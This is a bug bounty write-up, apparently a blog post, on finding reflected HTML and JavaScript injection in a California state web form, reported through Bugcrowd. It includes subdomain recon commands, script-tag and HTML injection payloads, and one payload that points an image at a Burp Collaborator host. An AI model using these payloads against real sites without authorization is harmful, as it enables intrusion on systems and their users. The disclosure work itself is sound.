HTML injection leads to JS injection in the State of California domain.
Har Har Mahadev! This is Prince Roy, a cyber security researcher. Last month, I found an HTML+JS injection in one of the domains of the state of California. And thanks to Aditya Shende sir for his mentorship.
Okay, guys, I am going to tell you how I found it with full steps. So, at first, I did recon and found out that all subdomains of [*.ca.gov]. Actually, I used Subfinder and httpx to collect whole live domains.
subfinder -d ca.gov | httpx -mc 200 | tee target.txt
then I opened all the domains and found a form in one domain
Then I put the below payload and found this
<script>alert(1)</script>
After reviewing the source code,
$(function(){
var inframe_param = "<script>alert(1)</script>";
if(inframe_param == "Y"){
$("#main-content-container").css("border","none");
} else {
$("#main-content-container").css("border","1px solid #CCC");
}
I found that it was not secure and did not filter any kind of HTML or JS. Along with that, it just closed by [" "] in <input></input> in the source code. Then I decided to try this payload:
"><script>alert("you have been hacked by royzsec")</script>
Boom! I got pop-up
Then I was like,
But one minute, guys, I saw their policy after finding this bug, and my reaction was like
Because they marked Rxss from out of scope from 5/9/23.
Then I started thinking about how I could change this vulnerability to another security isssue because I wanted to HOF from them. Then one thing came to mind: they just marked RXSS out of scope, not HTMLi or JS injection. Why should I not go with those attacks?
Then I injected the HMLI code
"><h1><img src="https://miro.medium.com/v2/resize:fit:640/format:webp/1*JIZCMl07i-cU_uPsJHPFBA.jpeg"><br>HACKED</h1>
The output was:
Wahh! Then I tried the burpcollab link like before to get an HTTP response.
"><h1><img src="https://*.burplink.net"><br>HACKED</h1>
But this time, I only got only mine HTTP response, not the server's or third party. I got my own CSRF.
Then I reported this report with sad mode
After one day they accept my report as a valid issue on Bugcrowd.
and listed on their Hall of Fame.
HOF Link: https://bugcrowd.com/cdt-vdp-pro/hall-of-fame
And finally, thanks in advance for reading my small write-up.
Please follow my Social media accounts for further updates:
Linkedin: https://www.linkedin.com/in/prince-roy-4b9a75187/
Twitter: https://twitter.com/royzsec
Github: https://github.com/royzsec